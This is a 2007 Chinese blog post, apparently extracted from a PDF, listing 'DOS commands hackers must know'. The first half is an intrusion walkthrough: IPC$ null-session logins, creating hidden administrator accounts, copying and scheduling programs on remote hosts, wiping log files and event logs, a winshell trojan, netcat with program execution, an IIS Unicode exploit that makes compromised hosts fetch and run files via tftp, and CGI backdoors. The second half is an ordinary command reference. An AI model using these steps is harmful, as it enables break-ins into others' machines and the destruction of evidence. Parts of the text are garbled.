1、个人中心 我的主页 好友 消息 cl695976737| 装扮 | 设置| 退出 Hack Domain世 界 尽 头主页 博客 相册|个人档案 |好友 |i 贴吧 查看文章 黑客必会的 DOS 命令2007 年 01 月 22 日 星期一 下午 11:28末天 黑客必会的 DOS 命令不用全背过 但是基本的入侵用到的必须要熟练比如关防火墙 建立隐藏帐户 设置密码 激活帐户 等常用的几条 NET 命令: (与远程主机建立空管连接) net use IP 地址 ipc$ “ /use:“ (以管理员身份登录远程主机) net use IP 地址 ipc$ “密码“ /use:“Administr
2、ator“ (传送文件到远程主机 WINNT 目录下)copy 本机目录路径 程序 IP 地址 admin$ (查看远程主机时间) net time IP 地址 (定时启动某个程序) at IP 地址 02:18 readme.exe (查看共享) net view IP 地址 (查看 netbios 工作组列表) nbtstat -A IP 地址 (将远程主机 C 盘映射为自己的 F 盘) net use f: IP 地址 c$ “/user:“Administrator“ (这两条把自己增加到管理员组): net user 用户名 密码 /add net localgroup Admini
3、strators 用户名 /add (断开连接) net use IP 地址 ipc$ /delete 扫尾: del C: winnt system32 logfiles *.* del C: winnt ssytem32 config *.evt del C: winnt system32 dtclog *.* del C: winnt system32 *.log del C: winnt system32 *.txt del C: winnt *.txt del C: winnt *.log 一、netsvc.exe 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务
4、”服务: netsvc /list IP 地址 netsvc schedule IP 地址 /query netsvc IP 地址 schedule /start 二、OpenTelnet.exe 远程启动主机的 Telnet 服务,并绑定端口到 7878,例如: OpenTelnet IP 地址 用户名 密码 1 7878 然后就可以 telnet 到主机的 7878 端口,进入 DOS 方式下: telnet IP 地址 7878 三、winshell.exe 一个非常小的木马(不到 6K),telnet 到主机的 7878 端口,输入密码 winshell,当看到 CMD后,可打下面的命
5、令: p Path (查看 winshell 主程序的路径信息) b reBoot (重新启动机器) d shutDown (关闭机器) s Shell (执行后你就会看到可爱的“C: ”) x eXit (退出本次登录会话,此命令并不终止 winshell 的运行) CMD http:/./srv.exe (通过 http 下载其他网站上的文件到运行 winshell 的机器上) 四、3389 登陆器,GUI 方式登录远程主机的 五、elsave.exe 事件日志清除工具 elsave -s IP 地址 -l “application“ -C elsave -s IP 地址 -l “syst
6、em“ -C elsave -s IP 地址 -l “security“ -C 执行后成功清除应用程序日志,系统日志,安全日志 六、hbulot.exe 开启 win2kserver 和 winxp 的 3389 服务 hbulot /r 使用/r 表示安装完成后自动重起目标使设置生效。 七、nc.exe(netcat.exe) 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 想要连接到某处: nc -options hostname ports ports . 绑定端口等待连接: nc -l -p port -options hostname port 参数: -e prog
7、 程序重定向,一旦连接,就执行 危险! -g gateway source-routing hop points, up to 8 -G num source-routing pointer: 4, 8, 12, . -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的 IP 地址,不能用 hostname -o file 记录 16 进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -u UDP 模式 -v 详细输出用两个-v 可得到更详细的内容 -w secs timeout 的时间 -z 将输入输出关掉
8、用于扫描时 八、TFTPD32.EXE 把自己的电脑临时变为一台 FTP 服务器,让肉鸡来下载文件, tftp 命令要在肉鸡上执行,通常要利用 Unicode 漏洞或 telnet 到肉鸡,例如: http:/IP 地址 /s cripts/%5c%5c/winnt/system32/cmd.exe?/c tftp -i 本机 IP 地址 get 文件名 c: winnt system32 文件名 然后可以直接令文件运行: http:/IP 地址 /s cripts/%5c%5c/winnt/system32/cmd.exe?/c 文件名 九、prihack.exe 是 IIS 的 print
9、er 远程缓冲区溢出工具。 idqover.exe 是溢出 idq 的,选择“溢出后在一个端口监听”,然后用 telnet 连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe 是一个图形界面的 ida 溢出,成功以后 winxp 下需要打 winxp。 一、ntis.exe、cmd.exe 和 cmdasp.asp 是三个 cgi-backdoor,exe 要放到 cgi-bin 目录下,asp放到有 ASP 执行权限的目录。然后用 IE 浏览器连接。 一、一 Xscan 命令行运行参数说明: 在检测过程中,按“空格“键可以查看各线程状态及扫描进度,按“q“
10、键保存当前数据后提前退出程序,按“强行关闭程序。 1.命令格式 : xscan -host - 其他选项 xscan -file 其他选项 其中 含义如下 : -port : 检测常用服务的端口状态(可通过 dat config.ini 文件的“PORT-SCAN-OPTIONS PORT-LIST“项定制待检测端口列表); -ftp : 检测 FTP 弱口令(可通过 dat config.ini 文件设置用户名/密码字典文件); -ntpass : 检测 NT-Server 弱口令(可通过 dat config.ini 文件设置用户名/密码字典文件); -cgi : 检测 CGI 漏洞(可通
11、过 dat config.ini 文件的“CGI-ENCODE encode_type“项设置编码方案); -iis : 检测 IIS 漏洞(可通过 dat config.ini 文件的“CGI-ENCODE encode_type“项设置编码方案);其他选项 含义如下: -v: 显示详细扫描进度 -p: 跳过 Ping 不通的主机 -o: 跳过没有检测到开放端口的主机 -t : 指定最大并发线程数量和并发主机数量, 默认数量为 100,10 一个黑客(才鸟也算) 必须熟练没一个入侵命令! 能够在 10 内建立一个隐藏帐户!才算熟练特殊 DOS 命令(1)assoc 命令:1.assoc .d
12、oc/查看与 doc 关联的是什么。2.assoc .doc = 空格/删除.doc 的关联(2)chdir(cd)命令:1.cd d:cs/将默认目录更改为 d:cs2.cd 回车 c/进入 c 盘(3)chkdsk/查找文件系统和文件系统数据中的错误,并显示查找结果的状态报告,还能修正磁盘错误。如果不带任何参数,将显示当前驱动器中的磁盘状态。(4)cls/清楚 dos 窗口上显示的所有信息(5)color/窗口颜色,可以用 /?具体设置。(6)comp/比较两个文件或几组文件的内容。/?查看。(7)convert/将 fat/fat32 转换为 ntfs1.convert d:/fs:nt
13、fs /v /将 d 盘转换为 ntfs。(8)driverquery/查看设备驱动程序1./s computer 指定远程计算机名称或 IP 地址2./p 指定用户的帐户的密码3.driverquery /s serverl /u hirpln /v /显示远程计算机上的用户 hirpln 的详细驱动信息。(9)echo /回显echo off/不显示命令行,只显示命令的结果。echo on/可以显示所执行的每个命令。(10)fdisk/磁盘分区(在 9X 和 ME 上用的)。(11)find/查找find“pencilsharpener“pencil.ad/从 pencil.ad 显示包含
14、“pencilsharpener”的所有行。(12)findstr/搜索文本1.findstr/i cpu book.txt/在当前目录下 book.txt 文件中查找字符 “cpu“,大小写忽略。2.findstr /s /i Windows*.*/在当前及其子目录下搜索包含“windows“的每个文件,不考虑大小写。1.dindstr“windows 2000“report.txt/查找 windows 或 2000。(13)finger/查看登录用户信息要用到网络连接。(14)format/格式化磁盘1.format d:/格式化 D 盘2.format d: /q/快速格式化 D 盘(
15、15)ftp/文件传输1.ftp-A ftpcn 的 FTP 服务器2.ftp-s:ftporder.txt ftp.coolpen.org/登陆到 ftp.coolpen.org 并运行 ftporder.txt 文件中的 ftp 命令。3.进入 ftp 后,open MAC 地址getmac /s 10.0.0.7 /u coolpen Administrarot /p password /fo list /v/查看地址为 10.0.0.7 的远程计算机上的域(COOLPEN)的用户 ADMINISTRATOR 的网络适配器的详细信息。(18)gpresult/查看组策略1.gpres
16、ult gp.txt/将组策略信息输出定向到 gp.txt(19)hostname/主机名(20)if/批处理条件(命令较多,用/ ?查看)(21)ipconfig/IP 信息1.ipconfig /all/查看所有适配器的完整 TCP/IP 配置信息。(22)irftp/红外线传输1.ipftp c:mymusicmusic.mp3 /h/将 music.mp3 发送到目标计算机上。2.ipftp c:mymusicmusic1.mp3 c:mymusic2.mp3 /h/将这两个文件发送到目标计算机上。(23)label/磁盘卷标1.label d:/为 D 盘加卷标(24)md/创建目录
17、1.md c:021/在 C 盘下创建 0 文件夹其下有 2 文件夹其下有 1 文件夹(25)mmc/管理控制台(26)mode/系统设置(27)move/移动文件1.move D:work111.doc F:000.doc/将 D:work111.doc 移动到 F 并改名为 000.doc(28)nbtstat/NETBIOS 统计数据,命令区分大小写1.nbtstat-A 10.0.0.7/显示 10.0.0.7 的 NetBIOS2.nbtstat-n 显示本机的 NetBIOS(29)net service/ 网络服务管理 accounts/用户帐户数据库 accounts/显示当前
18、设置 accounts /minpwlen:8/设置不少于 8 个字符的用户密码。 accounts /uniquepw:3/指定用户只有在 3 次更改密码后才可以重新使用密码。 accounts/minpwage:10/maxpwage:40 /forcelogoff:3/防止用户在 10 天内更改密码,而且强制用户每 40 天才能更改一次密码,并在登陆时间到期后用 3 分钟警告强制用户注销。 config/显示可配置服务。 config/查看正在运行的可配置服务 group/用户组 group/显示本地服务器上的所有组的列表。 group exec/add/将组 exec 添加到本地用户帐
19、户数据库 group admin 00 11 22 /add/将 00 11 22 帐户添加到 admin 组 group exec/显示 exec 组中的所有用户 group exec /comment:“000000“/在 exec 组添加备注 localgroup/本地组 localgroup/显示本地服务器上所有本地组的列表 name/消息名称 name/查看计算机上名称的列表 send/发送消息 send 000 hello/向 000 发送 send/users“hello”向 user 组发送 share/设置共享资源 share DataShare=D:Work /rem
20、ark:“日常样工作共享”/使用共享名为 datashare 共享计算机上的 D:work 目录并包括注释。 share datashare /delete/停止以上的共享。 start/启动服务。 start/列出当前正在运行的服务 start“routing and remote access”/启动“路由和远程访问”服务。 stop/停止服务 stop server/停止服务器服务 time/时钟同步 time 10.0.0.7 /set/将本地计算机与远程服务器( 10.0.0.7)同步。 use/共享网络资源 user/用户帐户 user/显示本地实际上机上所有用户帐户的列表 use
21、r 000/显示用户帐户 000 的信息 user AA 0000 /add /passwordreq:yes /times:m-f,8am-5pm /fullname:“AAAA“/添加 AAAA的用户 AA,登陆权限从周一到周五的上午 8 点到下午 5 点,切使用强制密码 0000,和用户全名。 user 0000 /time:M-F,08:00-17:00/使用 24 小时制设置 0000 的登陆时间 user 0000 /time:M-F,8am-5pm/使用 12 小时制设置 0000 的登陆时间 user 0000 /time:M,4am-5pm;T,1am-3pm;W-F,8:0
22、0-17:00/设置 0000 的登陆时间为周一上午 4 点到下午 5 点,周二下午 1 点到 3 点以及周三到周五的上午 8 点到下午 5 点。 view/显示共享资源列表sh 子命令/用于 TCP/IP 的 netsh 命令sh interface ip set address“本地连接“static 211.82.219.163 255.255.255.128211.82.219.254 1/本地连接采用静态 IP 地址,IP 为 211.82.219.163,子网掩码 255.255.255.128,默认网关 211.82.219.254,跃点数为 1。sh interface ip
23、add address“本地连接“192.168.100.100 255.255.255.0 192.168.100.1 1/为本地连接添加一条 IP 地址信息,IP 为 192.168.100.100,子网掩码为 255.255.255.0 默认网关为sh interface ip set dns name=“本地连接“source=dhcp/为本地连接设置动态获得 IP,DNS的服务器的 IP 也动 DHCP 服务器获得。stat -a/查看本机所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。(30)path/路径1.path c:usertaxes;b:userinv
24、est;b:bin/指定 windows XP 可以搜索 3 个目录以查找外部命令,这些目录的 3 个路径是: c:2.path=c:dos;c:windows;c:/查找文件在 dos 下再在 windows 下,再在 C 下(31)pause/暂停例如:我们要把许多软盘(或是 U 盘,软盘不多见了),要把里面的东西复制到硬盘,可以做一个批处理文件,如下:echo off:begincopy a:*.*echo 请插如驱动器 A:pausegoto begin(32)ping 连接测试,最常用的 DOS 命令之一,常常用来测试网络是否通。1.ping 中的*指发送的消息,及回响的消息数据字
25、段值为 32 字节。*ms 指从发出信息到收到的时间,超过 4000ms 时将显示连接超时TTL=*指 ping 的主机的 TTL 值,根据 TTL 一般可以确定所 PING 的主机的操作系统,windows XP/2000 一般是128;windows98 一般是 64;Uuix 一般是 255,在注册表里可以随便修该 TTL,所以这样确定的并不一定准确。2.ping -n 10 -l 50 百度 10 次每次发送 100 字节的数据包,3.ping -n 1 -r 9/测试网站百度的连通性和所经过的路由器和网关,并只发送一个数据包。常见出错信息:A:unknown host(不知名主机
26、),命名服务器有故障,或其名称不正确,或通信线路有故障B:network unreachable(网络不能到达)本地系统没有到达远程系统的路由,路由配置情况C:no answer(无响应)这种说名有到达远程主机的路由,却没接受不到它发给远程主机的任何分组报文,可能是远程主机没有工作,或本地或远程主机网络配置错误,或是本地或远程的路由没有工作,通信线路有故障,D:time out(超时)故障原因可能是到路由的连接问题,路由不能通过,也可能是远程主机已经死机(33)popd/更改储存目录 pushd/存储当前目录(34)print/打印1.print /d:LPT1 D:0.txt/将 D 下的
27、0。txt 发送到 ltp1 打印。(35)rasdial/自动建立连接(36)recover/数据恢复1.rscover a:worksfc.doc/恢复位于 A 中的 a:worksfc.doc(37)reg/修改注册表子项 用 /?查看具体,一般不要修改注册表。(38)rem/注释,在编辑 bat 的时候用来注释配置文件。使用 echo 命令显示。(39)ren/改名/也是一个十分常用的 DOS 命令。1.ren C:0.txt 1.txt/把 c:下的 0.txt 改为 1.txt 用空格时加“”。(40)rd/删除文件夹,1.rd E:backup000 /s/删除 000 文件夹及
28、其目录树。按 Y 确定2.rd E:backup000 /s /q/删除 000 文件夹不用按 Y 确定,(41)scandisk/磁盘扫描一定要的纯 DOS 下运行。(42)schtasks/任务计划1.schtasks /create /sc minute /mo 20 /tn “security script“ /tr 127.0.0.1sec.vbs/计划任务每 20 分钟运行一次。(43)shutdown/关闭或重启计算机1.shutdown -l/注销本地计算机用户2.shutdowm -s/关闭本地计算机 默认时间是 30 秒3.shutdown -r/重启本地计算机4.shut
29、down -s -t 60/在一分钟后自动关机,shutdown -a 停止本次关机。5.shutdown -i/稍微设置一下就可以关闭远程计算机,shutdown -a -m0000/取消关闭 0000。(44)sort/排序1.dir0.lstsort0.lst/把当前文件夹名称输入到 0.lst,然后显示排序。2.find “time” 0.txt|sort/查找 time 字符串,并对查找结果排序。(45)taskkill/结束进程1.taskkill /pid 892/结束 PID 为 892 的进程。(46)tasklist/显示进程(47)telnet/远程管理1.o 211.8
30、2.219.162 23/通过 23 号端口连接到 211.82.219.162。2.c gang 23/与远程服务器 gang 段开连接(48)time/系统时间(49)title/命令行窗口标题,建立批处理文件时用的着。1.title 黑客领域 By 末天/将命令提示行该为 黑客领域 By 末天(50)tracert/路由追踪1.tracert c: /f|more/显示 C 盘下的目录,每次一屏。(52)type/浏览文本1.type D:0.txt 显示 0.txt 的文本内容。(52)typeperf/性能记数器(53)ver/系统版本(54)vol/卷标(55)w32tm/时间服
31、务(56)waitfor/同步计算机(57)where/位置1.where /r c:widows *.exe *.dll *.bat/查找 windows 所有 exe,dll,bat 的文件2.where /f /t *.dll/查找所有 dll 文件并显示时间日期大小(58)winnt/安装 windows(59)xcopy/复制文件与目录1.xcopy a: c: /s /e 将 A 盘所有文件和子目录复制到 C 盘(60)copy/复制(这个常用的忘了整理了,也很常用哦_ )1.copy c:0.txt d:1.txt 把 C 盘下的 0.txt 放到 D 下, 并改名为 2.txt2.copy /b c:0.txt+c:0.jpg d:1.jpg/把 C 下的 0.txt 和 0.jpg 合并为 1.jpg 并放在 D 下
